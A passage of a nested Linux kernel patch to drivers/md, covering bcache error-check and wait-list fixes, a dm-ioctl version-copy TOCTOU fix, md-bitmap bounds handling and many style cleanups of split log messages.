++	while (nodes < GC_MERGE_NODES && !IS_ERR(r[nodes].b))
+ 		keys += r[nodes++].keys;
+ 
+ 	blocks = btree_default_blocks(b->c) * 2 / 3;
+@@ -1352,7 +1354,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 
+ 	for (i = 0; i < nodes; i++) {
+ 		new_nodes[i] = btree_node_alloc_replacement(r[i].b, NULL);
+-		if (IS_ERR_OR_NULL(new_nodes[i]))
++		if (IS_ERR(new_nodes[i]))
+ 			goto out_nocoalesce;
+ 	}
+ 
+@@ -1487,7 +1489,7 @@ out_nocoalesce:
+ 	bch_keylist_free(&keylist);
+ 
+ 	for (i = 0; i < nodes; i++)
+-		if (!IS_ERR_OR_NULL(new_nodes[i])) {
++		if (!IS_ERR(new_nodes[i])) {
+ 			btree_node_free(new_nodes[i]);
+ 			rw_unlock(true, new_nodes[i]);
+ 		}
+@@ -1669,7 +1671,7 @@ static int bch_btree_gc_root(struct btree *b, struct btree_op *op,
+ 	if (should_rewrite) {
+ 		n = btree_node_alloc_replacement(b, NULL);
+ 
+-		if (!IS_ERR_OR_NULL(n)) {
++		if (!IS_ERR(n)) {
+ 			bch_btree_node_write_sync(n);
+ 
+ 			bch_btree_set_root(n);
+@@ -1968,6 +1970,15 @@ static int bch_btree_check_thread(void *arg)
+ 			c->gc_stats.nodes++;
+ 			bch_btree_op_init(&op, 0);
+ 			ret = bcache_btree(check_recurse, p, c->root, &op);
++			/*
++			 * The op may be added to cache_set's btree_cache_wait
++			 * in mca_cannibalize(), must ensure it is removed from
++			 * the list and release btree_cache_alloc_lock before
++			 * free op memory.
++			 * Otherwise, the btree_cache_wait will be damaged.
++			 */
++			bch_cannibalize_unlock(c);
++			finish_wait(&c->btree_cache_wait, &(&op)->wait);
+ 			if (ret)
+ 				goto out;
+ 		}
+diff --git a/drivers/md/bcache/btree.h b/drivers/md/bcache/btree.h
+index 1b5fdbc0d83eb..a2920bbfcad56 100644
+--- a/drivers/md/bcache/btree.h
++++ b/drivers/md/bcache/btree.h
+@@ -282,6 +282,7 @@ void bch_initial_gc_finish(struct cache_set *c);
+ void bch_moving_gc(struct cache_set *c);
+ int bch_btree_check(struct cache_set *c);
+ void bch_initial_mark_key(struct cache_set *c, int level, struct bkey *k);
++void bch_cannibalize_unlock(struct cache_set *c);
+ 
+ static inline void wake_up_gc(struct cache_set *c)
+ {
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index ba3909bb6beab..7660962e7b8b4 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -1724,7 +1724,7 @@ static void cache_set_flush(struct closure *cl)
+ 	if (!IS_ERR_OR_NULL(c->gc_thread))
+ 		kthread_stop(c->gc_thread);
+ 
+-	if (!IS_ERR_OR_NULL(c->root))
++	if (!IS_ERR(c->root))
+ 		list_add(&c->root->list, &c->btree_cache);
+ 
+ 	/*
+@@ -2088,7 +2088,7 @@ static int run_cache_set(struct cache_set *c)
+ 
+ 		err = "cannot allocate new btree root";
+ 		c->root = __bch_btree_node_alloc(c, NULL, 0, true, NULL);
+-		if (IS_ERR_OR_NULL(c->root))
++		if (IS_ERR(c->root))
+ 			goto err;
+ 
+ 		mutex_lock(&c->root->write_lock);
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 0285b676e9834..7bac2a88b794a 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -890,6 +890,16 @@ static int bch_root_node_dirty_init(struct cache_set *c,
+ 	if (ret < 0)
+ 		pr_warn("sectors dirty init failed, ret=%d!\n", ret);
+ 
++	/*
++	 * The op may be added to cache_set's btree_cache_wait
++	 * in mca_cannibalize(), must ensure it is removed from
++	 * the list and release btree_cache_alloc_lock before
++	 * free op memory.
++	 * Otherwise, the btree_cache_wait will be damaged.
++	 */
++	bch_cannibalize_unlock(c);
++	finish_wait(&c->btree_cache_wait, &(&op.op)->wait);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index ee269b1d09fac..ff515437d81e7 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -733,8 +733,7 @@ static int crypt_iv_eboiv_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 	}
+ 
+ 	if (crypto_skcipher_blocksize(any_tfm(cc)) != cc->iv_size) {
+-		ti->error = "Block size of EBOIV cipher does "
+-			    "not match IV size of block cipher";
++		ti->error = "Block size of EBOIV cipher does not match IV size of block cipher";
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 6ae1c19b82433..2afd2d2a0f407 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -434,8 +434,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 		hc = __get_name_cell(new);
+ 
+ 	if (hc) {
+-		DMERR("Unable to change %s on mapped device %s to one that "
+-		      "already exists: %s",
++		DMERR("Unable to change %s on mapped device %s to one that already exists: %s",
+ 		      change_uuid ? "uuid" : "name",
+ 		      param->name, new);
+ 		dm_put(hc->md);
+@@ -1572,7 +1571,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	/*
+ 	 * Count the devices.
+ 	 */
+-	list_for_each (tmp, dm_table_get_devices(table))
++	list_for_each(tmp, dm_table_get_devices(table))
+ 		count++;
+ 
+ 	/*
+@@ -1589,7 +1588,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	 */
+ 	deps->count = count;
+ 	count = 0;
+-	list_for_each_entry (dd, dm_table_get_devices(table), list)
++	list_for_each_entry(dd, dm_table_get_devices(table), list)
+ 		deps->dev[count++] = huge_encode_dev(dd->dm_dev->bdev->bd_dev);
+ 
+ 	param->data_size = param->data_start + needed;
+@@ -1812,31 +1811,36 @@ static ioctl_fn lookup_ioctl(unsigned int cmd, int *ioctl_flags)
+  * As well as checking the version compatibility this always
+  * copies the kernel interface version out.
+  */
+-static int check_version(unsigned int cmd, struct dm_ioctl __user *user)
++static int check_version(unsigned int cmd, struct dm_ioctl __user *user,
++			 struct dm_ioctl *kernel_params)
+ {
+-	uint32_t version[3];
+ 	int r = 0;
+ 
+-	if (copy_from_user(version, user->version, sizeof(version)))
++	/* Make certain version is first member of dm_ioctl struct */
++	BUILD_BUG_ON(offsetof(struct dm_ioctl, version) != 0);
++
++	if (copy_from_user(kernel_params->version, user->version, sizeof(kernel_params->version)))
+ 		return -EFAULT;
+ 
+-	if ((DM_VERSION_MAJOR != version[0]) ||
+-	    (DM_VERSION_MINOR < version[1])) {
+-		DMERR("ioctl interface mismatch: "
+-		      "kernel(%u.%u.%u), user(%u.%u.%u), cmd(%d)",
++	if ((kernel_params->version[0] != DM_VERSION_MAJOR) ||
++	    (kernel_params->version[1] > DM_VERSION_MINOR)) {
++		DMERR("ioctl interface mismatch: kernel(%u.%u.%u), user(%u.%u.%u), cmd(%d)",
+ 		      DM_VERSION_MAJOR, DM_VERSION_MINOR,
+ 		      DM_VERSION_PATCHLEVEL,
+-		      version[0], version[1], version[2], cmd);
++		      kernel_params->version[0],
++		      kernel_params->version[1],
++		      kernel_params->version[2],
++		      cmd);
+ 		r = -EINVAL;
+ 	}
+ 
+ 	/*
+ 	 * Fill in the kernel version.
+ 	 */
+-	version[0] = DM_VERSION_MAJOR;
+-	version[1] = DM_VERSION_MINOR;
+-	version[2] = DM_VERSION_PATCHLEVEL;
+-	if (copy_to_user(user->version, version, sizeof(version)))
++	kernel_params->version[0] = DM_VERSION_MAJOR;
++	kernel_params->version[1] = DM_VERSION_MINOR;
++	kernel_params->version[2] = DM_VERSION_PATCHLEVEL;
++	if (copy_to_user(user->version, kernel_params->version, sizeof(kernel_params->version)))
+ 		return -EFAULT;
+ 
+ 	return r;
+@@ -1862,7 +1866,10 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+ 	unsigned int noio_flag;
+ 
+-	if (copy_from_user(param_kernel, user, minimum_data_size))
++	/* check_version() already copied version from userspace, avoid TOCTOU */
++	if (copy_from_user((char *)param_kernel + sizeof(param_kernel->version),
++			   (char __user *)user + sizeof(param_kernel->version),
++			   minimum_data_size - sizeof(param_kernel->version)))
+ 		return -EFAULT;
+ 
+ 	if (param_kernel->data_size < minimum_data_size) {
+@@ -1974,7 +1981,7 @@ static int ctl_ioctl(struct file *file, uint command, struct dm_ioctl __user *us
+ 	 * Check the interface version passed in.  This also
+ 	 * writes out the kernel's interface version.
+ 	 */
+-	r = check_version(cmd, user);
++	r = check_version(cmd, user, &param_kernel);
+ 	if (r)
+ 		return r;
+ 
+diff --git a/drivers/md/dm-log-userspace-transfer.c b/drivers/md/dm-log-userspace-transfer.c
+index 072559b709edd..ee5586e8e1c1e 100644
+--- a/drivers/md/dm-log-userspace-transfer.c
++++ b/drivers/md/dm-log-userspace-transfer.c
+@@ -108,9 +108,8 @@ static int fill_pkg(struct cn_msg *msg, struct dm_ulog_request *tfr)
+ 			if (pkg->error != -EAGAIN)
+ 				*(pkg->data_size) = 0;
+ 		} else if (tfr->data_size > *(pkg->data_size)) {
+-			DMERR("Insufficient space to receive package [%u] "
+-			      "(%u vs %zu)", tfr->request_type,
+-			      tfr->data_size, *(pkg->data_size));
++			DMERR("Insufficient space to receive package [%u] (%u vs %zu)",
++			      tfr->request_type, tfr->data_size, *(pkg->data_size));
+ 
+ 			*(pkg->data_size) = 0;
+ 			pkg->error = -ENOSPC;
+diff --git a/drivers/md/dm-log.c b/drivers/md/dm-log.c
+index 159f2c05dfd3c..05141eea18d3c 100644
+--- a/drivers/md/dm-log.c
++++ b/drivers/md/dm-log.c
+@@ -382,8 +382,7 @@ static int create_log_context(struct dm_dirty_log *log, struct dm_target *ti,
+ 		else if (!strcmp(argv[1], "nosync"))
+ 			sync = NOSYNC;
+ 		else {
+-			DMWARN("unrecognised sync argument to "
+-			       "dirty region log: %s", argv[1]);
++			DMWARN("unrecognised sync argument to dirty region log: %s", argv[1]);
+ 			return -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c
+index 91c25ad8eed84..66032ab3c4e92 100644
+--- a/drivers/md/dm-mpath.c
++++ b/drivers/md/dm-mpath.c
+@@ -1086,7 +1086,7 @@ static int parse_hw_handler(struct dm_arg_set *as, struct multipath *m)
+ 			goto fail;
+ 		}
+ 		j = sprintf(p, "%d", hw_argc - 1);
+-		for (i = 0, p+=j+1; i <= hw_argc - 2; i++, p+=j+1)
++		for (i = 0, p += j + 1; i <= hw_argc - 2; i++, p += j + 1)
+ 			j = sprintf(p, "%s", as->argv[i]);
+ 	}
+ 	dm_consume_args(as, hw_argc - 1);
+diff --git a/drivers/md/dm-ps-service-time.c b/drivers/md/dm-ps-service-time.c
+index 84d26234dc053..eba2293be6864 100644
+--- a/drivers/md/dm-ps-service-time.c
++++ b/drivers/md/dm-ps-service-time.c
+@@ -127,8 +127,7 @@ static int st_add_path(struct path_selector *ps, struct dm_path *path,
+ 	 * 			The valid range: 0-<ST_MAX_RELATIVE_THROUGHPUT>
+ 	 *			If not given, minimum value '1' is used.
+ 	 *			If '0' is given, the path isn't selected while
+-	 * 			other paths having a positive value are
+-	 * 			available.
++	 *			other paths having a positive value are	available.
+ 	 */
+ 	if (argc > 2) {
+ 		*error = "service-time ps: incorrect number of arguments";
+diff --git a/drivers/md/dm-raid1.c b/drivers/md/dm-raid1.c
+index 8bd7e87d3538e..c38e63706d911 100644
+--- a/drivers/md/dm-raid1.c
++++ b/drivers/md/dm-raid1.c
+@@ -236,8 +236,8 @@ static void fail_mirror(struct mirror *m, enum dm_raid1_error error_type)
+ 		 * Better to issue requests to same failing device
+ 		 * than to risk returning corrupt data.
+ 		 */
+-		DMERR("Primary mirror (%s) failed while out-of-sync: "
+-		      "Reads may fail.", m->dev->name);
++		DMERR("Primary mirror (%s) failed while out-of-sync: Reads may fail.",
++		      m->dev->name);
+ 		goto out;
+ 	}
+ 
+@@ -517,8 +517,7 @@ static void read_callback(unsigned long error, void *context)
+ 	fail_mirror(m, DM_RAID1_READ_ERROR);
+ 
+ 	if (likely(default_ok(m)) || mirror_available(m->ms, bio)) {
+-		DMWARN_LIMIT("Read failure on mirror device %s.  "
+-			     "Trying alternative device.",
++		DMWARN_LIMIT("Read failure on mirror device %s. Trying alternative device.",
+ 			     m->dev->name);
+ 		queue_bio(m->ms, bio, bio_data_dir(bio));
+ 		return;
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 5176810f5d243..80b95746a43e0 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -354,8 +354,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ 		return 0;
+ 
+ 	if (chunk_size_supplied)
+-		DMWARN("chunk size %u in device metadata overrides "
+-		       "table chunk size of %u.",
++		DMWARN("chunk size %u in device metadata overrides table chunk size of %u.",
+ 		       chunk_size, ps->store->chunk_size);
+ 
+ 	/* We had a bogus chunk_size. Fix stuff up. */
+@@ -958,8 +957,7 @@ int dm_persistent_snapshot_init(void)
+ 
+ 	r = dm_exception_store_type_register(&_persistent_compat_type);
+ 	if (r) {
+-		DMERR("Unable to register old-style persistent exception "
+-		      "store type");
++		DMERR("Unable to register old-style persistent exception store type");
+ 		dm_exception_store_type_unregister(&_persistent_type);
+ 		return r;
+ 	}
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index d83a0565bd101..11de107f5f462 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -140,8 +140,7 @@ int dm_transient_snapshot_init(void)
+ 
+ 	r = dm_exception_store_type_register(&_transient_compat_type);
+ 	if (r) {
+-		DMWARN("Unable to register old-style transient "
+-		       "exception store type");
++		DMWARN("Unable to register old-style transient exception store type");
+ 		dm_exception_store_type_unregister(&_transient_type);
+ 		return r;
+ 	}
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index c64d987c544d7..b748901a4fb55 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -388,7 +388,7 @@ static struct origin *__lookup_origin(struct block_device *origin)
+ 	struct origin *o;
+ 
+ 	ol = &_origins[origin_hash(origin)];
+-	list_for_each_entry (o, ol, hash_list)
++	list_for_each_entry(o, ol, hash_list)
+ 		if (bdev_equal(o->bdev, origin))
+ 			return o;
+ 
+@@ -407,7 +407,7 @@ static struct dm_origin *__lookup_dm_origin(struct block_device *origin)
+ 	struct dm_origin *o;
+ 
+ 	ol = &_dm_origins[origin_hash(origin)];
+-	list_for_each_entry (o, ol, hash_list)
++	list_for_each_entry(o, ol, hash_list)
+ 		if (bdev_equal(o->dev->bdev, origin))
+ 			return o;
+ 
+@@ -490,8 +490,7 @@ static int __validate_exception_handover(struct dm_snapshot *snap)
+ 	if ((__find_snapshots_sharing_cow(snap, &snap_src, &snap_dest,
+ 					  &snap_merge) == 2) ||
+ 	    snap_dest) {
+-		snap->ti->error = "Snapshot cow pairing for exception "
+-				  "table handover failed";
++		snap->ti->error = "Snapshot cow pairing for exception table handover failed";
+ 		return -EINVAL;
+ 	}
+ 
+@@ -518,8 +517,7 @@ static int __validate_exception_handover(struct dm_snapshot *snap)
+ 
+ 	if (!snap_src->store->type->prepare_merge ||
+ 	    !snap_src->store->type->commit_merge) {
+-		snap->ti->error = "Snapshot exception store does not "
+-				  "support snapshot-merge.";
++		snap->ti->error = "Snapshot exception store does not support snapshot-merge.";
+ 		return -EINVAL;
+ 	}
+ 
+@@ -937,8 +935,7 @@ static int __remove_single_exception_chunk(struct dm_snapshot *s,
+ 
+ 	e = dm_lookup_exception(&s->complete, old_chunk);
+ 	if (!e) {
+-		DMERR("Corruption detected: exception for block %llu is "
+-		      "on disk but not in memory",
++		DMERR("Corruption detected: exception for block %llu is on disk but not in memory",
+ 		      (unsigned long long)old_chunk);
+ 		return -EINVAL;
+ 	}
+@@ -965,8 +962,7 @@ static int __remove_single_exception_chunk(struct dm_snapshot *s,
+ 		e->new_chunk++;
+ 	} else if (old_chunk != e->old_chunk +
+ 		   dm_consecutive_chunk_count(e)) {
+-		DMERR("Attempt to merge block %llu from the "
+-		      "middle of a chunk range [%llu - %llu]",
++		DMERR("Attempt to merge block %llu from the middle of a chunk range [%llu - %llu]",
+ 		      (unsigned long long)old_chunk,
+ 		      (unsigned long long)e->old_chunk,
+ 		      (unsigned long long)
+@@ -1059,8 +1055,7 @@ static void snapshot_merge_next_chunks(struct dm_snapshot *s)
+ 						      &new_chunk);
+ 	if (linear_chunks <= 0) {
+ 		if (linear_chunks < 0) {
+-			DMERR("Read error in exception store: "
+-			      "shutting down merge");
++			DMERR("Read error in exception store: shutting down merge");
+ 			down_write(&s->lock);
+ 			s->merge_failed = true;
+ 			up_write(&s->lock);
+@@ -2208,12 +2203,10 @@ static int snapshot_preresume(struct dm_target *ti)
+ 	if (snap_src && snap_dest) {
+ 		down_read(&snap_src->lock);
+ 		if (s == snap_src) {
+-			DMERR("Unable to resume snapshot source until "
+-			      "handover completes.");
++			DMERR("Unable to resume snapshot source until handover completes.");
+ 			r = -EINVAL;
+ 		} else if (!dm_suspended(snap_src->ti)) {
+-			DMERR("Unable to perform snapshot handover until "
+-			      "source is suspended.");
++			DMERR("Unable to perform snapshot handover until source is suspended.");
+ 			r = -EINVAL;
+ 		}
+ 		up_read(&snap_src->lock);
+@@ -2446,7 +2439,7 @@ static int __origin_write(struct list_head *snapshots, sector_t sector,
+ 	chunk_t chunk;
+ 
+ 	/* Do all the snapshots on this origin */
+-	list_for_each_entry (snap, snapshots, list) {
++	list_for_each_entry(snap, snapshots, list) {
+ 		/*
+ 		 * Don't make new exceptions in a merging snapshot
+ 		 * because it has effectively been deleted
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index a81ed080730a7..547aefe85c076 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -108,15 +108,13 @@ static int stripe_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 
+ 	width = ti->len;
+ 	if (sector_div(width, stripes)) {
+-		ti->error = "Target length not divisible by "
+-		    "number of stripes";
++		ti->error = "Target length not divisible by number of stripes";
+ 		return -EINVAL;
+ 	}
+ 
+ 	tmp_len = width;
+ 	if (sector_div(tmp_len, chunk_size)) {
+-		ti->error = "Target length not divisible by "
+-		    "chunk size";
++		ti->error = "Target length not divisible by chunk size";
+ 		return -EINVAL;
+ 	}
+ 
+@@ -124,15 +122,13 @@ static int stripe_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	 * Do we have enough arguments for that many stripes ?
+ 	 */
+ 	if (argc != (2 + 2 * stripes)) {
+-		ti->error = "Not enough destinations "
+-			"specified";
++		ti->error = "Not enough destinations specified";
+ 		return -EINVAL;
+ 	}
+ 
+ 	sc = kmalloc(struct_size(sc, stripe, stripes), GFP_KERNEL);
+ 	if (!sc) {
+-		ti->error = "Memory allocation for striped context "
+-		    "failed";
++		ti->error = "Memory allocation for striped context failed";
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 3acded2f976db..288f600ee56dc 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -211,7 +211,7 @@ static struct dm_dev_internal *find_device(struct list_head *l, dev_t dev)
+ {
+ 	struct dm_dev_internal *dd;
+ 
+-	list_for_each_entry (dd, l, list)
++	list_for_each_entry(dd, l, list)
+ 		if (dd->dm_dev->bdev->bd_dev == dev)
+ 			return dd;
+ 
+@@ -234,8 +234,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 		return 0;
+ 
+ 	if ((start >= dev_size) || (start + len > dev_size)) {
+-		DMERR("%s: %pg too small for target: "
+-		      "start=%llu, len=%llu, dev_size=%llu",
++		DMERR("%s: %pg too small for target: start=%llu, len=%llu, dev_size=%llu",
+ 		      dm_device_name(ti->table->md), bdev,
+ 		      (unsigned long long)start,
+ 		      (unsigned long long)len,
+@@ -280,8 +279,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 		return 0;
+ 
+ 	if (start & (logical_block_size_sectors - 1)) {
+-		DMERR("%s: start=%llu not aligned to h/w "
+-		      "logical block size %u of %pg",
++		DMERR("%s: start=%llu not aligned to h/w logical block size %u of %pg",
+ 		      dm_device_name(ti->table->md),
+ 		      (unsigned long long)start,
+ 		      limits->logical_block_size, bdev);
+@@ -289,8 +287,7 @@ static int device_area_is_invalid(struct dm_target *ti, struct dm_dev *dev,
+ 	}
+ 
+ 	if (len & (logical_block_size_sectors - 1)) {
+-		DMERR("%s: len=%llu not aligned to h/w "
+-		      "logical block size %u of %pg",
++		DMERR("%s: len=%llu not aligned to h/w logical block size %u of %pg",
+ 		      dm_device_name(ti->table->md),
+ 		      (unsigned long long)len,
+ 		      limits->logical_block_size, bdev);
+@@ -880,8 +877,7 @@ static int dm_table_determine_type(struct dm_table *t)
+ 			bio_based = 1;
+ 
+ 		if (bio_based && request_based) {
+-			DMERR("Inconsistent table: different target types"
+-			      " can't be mixed up");
++			DMERR("Inconsistent table: different target types can't be mixed up");
+ 			return -EINVAL;
+ 		}
+ 	}
+@@ -1184,8 +1180,7 @@ static int dm_table_register_integrity(struct dm_table *t)
+ 	 * profile the new profile should not conflict.
+ 	 */
+ 	if (blk_integrity_compare(dm_disk(md), template_disk) < 0) {
+-		DMERR("%s: conflict with existing integrity profile: "
+-		      "%s profile mismatch",
++		DMERR("%s: conflict with existing integrity profile: %s profile mismatch",
+ 		      dm_device_name(t->md),
+ 		      template_disk->disk_name);
+ 		return 1;
+@@ -1698,8 +1693,7 @@ combine_limits:
+ 		 * for the table.
+ 		 */
+ 		if (blk_stack_limits(limits, &ti_limits, 0) < 0)
+-			DMWARN("%s: adding target device "
+-			       "(start sect %llu len %llu) "
++			DMWARN("%s: adding target device (start sect %llu len %llu) "
+ 			       "caused an alignment inconsistency",
+ 			       dm_device_name(t->md),
+ 			       (unsigned long long) ti->begin,
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 59eb1cb7037a0..4a0e15109997b 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -265,15 +265,15 @@ static int sb_check(struct dm_block_validator *v,
+ 	__le32 csum_le;
+ 
+ 	if (dm_block_location(b) != le64_to_cpu(disk_super->blocknr)) {
+-		DMERR("sb_check failed: blocknr %llu: "
+-		      "wanted %llu", le64_to_cpu(disk_super->blocknr),
++		DMERR("sb_check failed: blocknr %llu: wanted %llu",
++		      le64_to_cpu(disk_super->blocknr),
+ 		      (unsigned long long)dm_block_location(b));
+ 		return -ENOTBLK;
+ 	}
+ 
+ 	if (le64_to_cpu(disk_super->magic) != THIN_SUPERBLOCK_MAGIC) {
+-		DMERR("sb_check failed: magic %llu: "
+-		      "wanted %llu", le64_to_cpu(disk_super->magic),
++		DMERR("sb_check failed: magic %llu: wanted %llu",
++		      le64_to_cpu(disk_super->magic),
+ 		      (unsigned long long)THIN_SUPERBLOCK_MAGIC);
+ 		return -EILSEQ;
+ 	}
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index 2c9ba561fd8e9..12a5d4fb7d441 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -3,7 +3,7 @@
+  * Device Mapper Uevent Support
+  *
+  * Copyright IBM Corporation, 2007
+- * 	Author: Mike Anderson <andmike@linux.vnet.ibm.com>
++ *	Author: Mike Anderson <andmike@linux.vnet.ibm.com>
+  */
+ #ifndef DM_UEVENT_H
+ #define DM_UEVENT_H
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index 431c84595ddb7..c6ff43a8f0b25 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -85,12 +85,12 @@ struct wc_entry {
+ 	unsigned short wc_list_contiguous;
+ 	bool write_in_progress
+ #if BITS_PER_LONG == 64
+-		:1
++		: 1
+ #endif
+ 	;
+ 	unsigned long index
+ #if BITS_PER_LONG == 64
+-		:47
++		: 47
+ #endif
+ 	;
+ 	unsigned long age;
+diff --git a/drivers/md/dm-zoned-metadata.c b/drivers/md/dm-zoned-metadata.c
+index c795ea7da7917..0548b5d925f74 100644
+--- a/drivers/md/dm-zoned-metadata.c
++++ b/drivers/md/dm-zoned-metadata.c
+@@ -1013,11 +1013,9 @@ static int dmz_check_sb(struct dmz_metadata *zmd, struct dmz_sb *dsb,
+ 	}
+ 
+ 	sb_block = le64_to_cpu(sb->sb_block);
+-	if (sb_block != (u64)dsb->zone->id << zmd->zone_nr_blocks_shift ) {
+-		dmz_dev_err(dev, "Invalid superblock position "
+-			    "(is %llu expected %llu)",
+-			    sb_block,
+-			    (u64)dsb->zone->id << zmd->zone_nr_blocks_shift);
++	if (sb_block != (u64)dsb->zone->id << zmd->zone_nr_blocks_shift) {
++		dmz_dev_err(dev, "Invalid superblock position (is %llu expected %llu)",
++			    sb_block, (u64)dsb->zone->id << zmd->zone_nr_blocks_shift);
+ 		return -EINVAL;
+ 	}
+ 	if (zmd->sb_version > 1) {
+@@ -1030,16 +1028,14 @@ static int dmz_check_sb(struct dmz_metadata *zmd, struct dmz_sb *dsb,
+ 		} else if (uuid_is_null(&zmd->uuid)) {
+ 			uuid_copy(&zmd->uuid, &sb_uuid);
+ 		} else if (!uuid_equal(&zmd->uuid, &sb_uuid)) {
+-			dmz_dev_err(dev, "mismatching DM-Zoned uuid, "
+-				    "is %pUl expected %pUl",
++			dmz_dev_err(dev, "mismatching DM-Zoned uuid, is %pUl expected %pUl",
+ 				    &sb_uuid, &zmd->uuid);
+ 			return -ENXIO;
+ 		}
+ 		if (!strlen(zmd->label))
+ 			memcpy(zmd->label, sb->dmz_label, BDEVNAME_SIZE);
+ 		else if (memcmp(zmd->label, sb->dmz_label, BDEVNAME_SIZE)) {
+-			dmz_dev_err(dev, "mismatching DM-Zoned label, "
+-				    "is %s expected %s",
++			dmz_dev_err(dev, "mismatching DM-Zoned label, is %s expected %s",
+ 				    sb->dmz_label, zmd->label);
+ 			return -ENXIO;
+ 		}
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index e7cc6ba1b657f..8bbeeec70905c 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -54,14 +54,7 @@ __acquires(bitmap->lock)
+ {
+ 	unsigned char *mappage;
+ 
+-	if (page >= bitmap->pages) {
+-		/* This can happen if bitmap_start_sync goes beyond
+-		 * End-of-device while looking for a whole page.
+-		 * It is harmless.
+-		 */
+-		return -EINVAL;
+-	}
+-
++	WARN_ON_ONCE(page >= bitmap->pages);
+ 	if (bitmap->bp[page].hijacked) /* it's hijacked, don't try to alloc */
+ 		return 0;
+ 
+@@ -1000,7 +993,6 @@ static int md_bitmap_file_test_bit(struct bitmap *bitmap, sector_t block)
+ 	return set;
+ }
+ 
+-
+ /* this gets called when the md device is ready to unplug its underlying
+  * (slave) device queues -- before we let any writes go down, we need to
+  * sync the dirty pages of the bitmap file to disk */
+@@ -1010,8 +1002,7 @@ void md_bitmap_unplug(struct bitmap *bitmap)
+ 	int dirty, need_write;
+ 	int writing = 0;
+ 
+-	if (!bitmap || !bitmap->storage.filemap ||
+-	    test_bit(BITMAP_STALE, &bitmap->flags))
++	if (!md_bitmap_enabled(bitmap))
+ 		return;
+ 
+ 	/* look at each page to see if there are any set bits that need to be
+@@ -1364,6 +1355,14 @@ __acquires(bitmap->lock)
+ 	sector_t csize;
+ 	int err;
+ 
++	if (page >= bitmap->pages) {
++		/*
++		 * This can happen if bitmap_start_sync goes beyond
++		 * End-of-device while looking for a whole page or
++		 * user set a huge number to sysfs bitmap_set_bits.
++		 */
++		return NULL;
++	}
+ 	err = md_bitmap_checkpage(bitmap, page, create, 0);
+ 
+ 	if (bitmap->bp[page].hijacked ||
+diff --git a/drivers/md/md-bitmap.h b/drivers/md/md-bitmap.h
+index cfd7395de8fd3..3a4750952b3a7 100644
+--- a/drivers/md/md-bitmap.h
++++ b/drivers/md/md-bitmap.h
+@@ -273,6 +273,13 @@ int md_bitmap_copy_from_slot(struct mddev *mddev, int slot,
+ 			     sector_t *lo, sector_t *hi, bool clear_bits);
+ void md_bitmap_free(struct bitmap *bitmap);
+ void md_bitmap_wait_behind_writes(struct mddev *mddev);
++
++static inline bool md_bitmap_enabled(struct bitmap *bitmap)
++{
++	return bitmap && bitmap->storage.filemap &&
++	       !test_bit(BITMAP_STALE, &bitmap->flags);
++}
++
+ #endif
+ 
+ #endif
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index bb73a541bb193..829e1bd9bcbf9 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3830,8 +3830,9 @@ int strict_strtoul_scaled(const char *cp, unsigned long *res, int scale)
+ static ssize_t
+ safe_delay_show(struct mddev *mddev, char *page)
+ {
+-	int msec = (mddev->safemode_delay*1000)/HZ;
+-	return sprintf(page, "%d.%03d\n", msec/1000, msec%1000);
++	unsigned int msec = ((unsigned long)mddev->safemode_delay*1000)/HZ;
++
++	return sprintf(page, "%u.%03u\n", msec/1000, msec%1000);
+ }
+ static ssize_t
+ safe_delay_store(struct mddev *mddev, const char *cbuf, size_t len)
